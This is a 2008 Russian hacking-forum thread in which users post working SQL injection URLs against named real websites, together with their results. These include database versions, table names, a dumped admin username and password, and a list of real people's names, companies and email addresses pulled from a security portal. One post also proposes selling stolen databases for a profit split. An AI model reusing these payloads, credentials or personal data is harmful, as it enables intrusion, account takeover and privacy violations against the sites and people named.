ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5441  
Старый 10.05.2008, 20:40
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.vreaucredit.md/test/bank_info.php?bank_id=-99999+union+select+1,2,3,4,5,6 ,7,8,9,0/*
user()-17447@localhost
version () -5.0.27
database() -17447
information_schema.tables prisutstvuet...
 
Ответить с цитированием

  #5442  
Старый 10.05.2008, 21:17
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

http://www.millennium.net.ua/catalog/?id=-1+union+select+concat(name,':',passwd)+from+users+ limit+0,1/*
http://www.millennium.net.ua/admin/login.php
artem:vfkmdbyf
 
Ответить с цитированием

  #5443  
Старый 10.05.2008, 22:21
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.eastsidehockeymanager.net/news.php?view=news&gid=24&id=1261+and+1=2+union+all+select+1,2,concat(user,char(58),password),null,5,null,null,null,null,null,11,null,13,null+from+mysql.user--
Код:
http://www.bccracunari.com/katalog/detail.php?id=968+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12+from+user--
Код:
http://job.zp.ua/vip.php?id=2+and+1=2+union+all+select+1,2,3,4,concat(login,char(58),passw),6,7+from+admin--
Код:
http://www.iteforum.com/sell.php?id=179182+and+1=2+union+all+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14+from+users--

Последний раз редактировалось SWAT; 10.05.2008 в 22:33..
 
Ответить с цитированием

  #5444  
Старый 11.05.2008, 00:12
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.mobilevideonet.com/site/index.php?onderdeelID=1&paginaID=1&itemID=-141+union+select+1,2,3,4,5,6,7,8,9,table_name,1,2, 3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0+from+information_schema.tables+limit+50,1/*

http://www.mobilevideonet.com/admin

table_name : m_admin
columns : username, password
go go go....
 
Ответить с цитированием

  #5445  
Старый 11.05.2008, 00:30
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.wallpapervillage.com/wallpaper.php?wallpaperid=-21683+union+select+version(),2,3 ,4,5,6/*
 
Ответить с цитированием

  #5446  
Старый 11.05.2008, 12:07
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

http://mirlestnic.mirlestnic-vrn.ru/site.php?id=-1+union+select+user(),version(),3,database(),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
 
Ответить с цитированием

  #5447  
Старый 11.05.2008, 12:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.fertiligene.com/page.php?coul=1&pos=4&pos2=1&idproduit=-150+union+select+table_n ame+from+information_schema.tables+limit+1,1/*

takje iuzaite information_schema.columns i budet vam s4ast'e..i ne zabivaite pro limit..
 
Ответить с цитированием

  #5448  
Старый 11.05.2008, 14:20
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Zircool ЧИТАЙ правила !!!
http://forum.antichat.org/showpost.php?p=171306&postcount=1
 
Ответить с цитированием

  #5449  
Старый 11.05.2008, 16:21
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

http://omk.ru/ru/press/news/index.php?id9=1172+AND+NEWS.VERSION=0+AND+NEWS.LAN G_ID=1+and+substring(version(),1,1)=%223%22

version: 3.23.58
user: omk

хм.. впервые встретил третью версию.
Хотелось бы с ней поекспериментирвать, но никакого намека на таблицы не встретил
 
Ответить с цитированием

  #5450  
Старый 11.05.2008, 17:51
xena-mil1
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846

Репутация: 55
По умолчанию

Код:
http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@version
добавлю

Xena Military private sql injection Exploit version 2.0

SQL Injection Private Exploit


System user: DED296\IUSR_DED296
Database name: SecurityPark
Server name: DED296
IS Sysadmin ? : 0
User databases number: 26
User tables count in curent DB: 80
Permission to create tables: Yes
SQL Server version: 2000
Windows version: 2003 SP1

Database: SecurityPark Table: arenatb_register

records:6681

registerid(int) name(varchar) company(varchar) email(varchar)
4598 Lucian Salsa lucian.oana@gmail.com
6009 jim scharff Access Management Systems Limi jim.scharff@amsgroup.uk.com
1518 Jacki Massaro ADLT Jacki_Massaro@ADLT.com
1634 Dzmitry Naumovich JV "UNIBELUS" ltd terra@unibelus.com
2696 Zulkafli BNM zulkafli@bnm.gov.my
6443 Joe Morris Riggs Bank jmorris@usa.net
3302 Wayne Allen Easy-Sec info@easy-sec.co.uk
2512 Laurie Wignall Wincanton Ltd laurie@eurolog.org
3861 marton yona rafael jonam@rafael.co.il
5017 Christine Geovision christine@geovision.com.tw
2597 Boulgouris boulgouris@tee.gr
4420 Gaurav Inurface Solutions raheja_1_gaurav@rediffmail.com
5122 bob jones webmaster@interproach.com
716 John Camilleri EAGLE SECURITY SYSTEMS info@eaglesecurity.org
18 Andy Short Farsight Ltd andy_short@farsight.co.uk
1322 kenny visionlinkplus ltd kenny.mckaig@visionlinkplus.co
1046 russell 121 fire and security russell@121security.freeserve.
6484 Paul Smith J P Alarms j.paul@jpalarms.co.uk
5394 barnet barnet4444@yahoo.com
3848 mark frost NetApps mark.frost@netapp.com
5220 Jonathan Leason Dictator Engineering Ltd j.leason@dictatordirect.com
459 Darren Chalmers-Stev VERITAS Software Ltd darren.chalmer-stevens@veritas
4930 paul wellfair pwellfair@uk2.net
2734 Talboom GIMV elinet@gimv.be



P.S. Елси найдете инекцию в ASP на серезном сайте можете стучать в асю, когда вытянем и продадим базу $ 50/50 .

icq 2617 ( 6 ) 1574
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ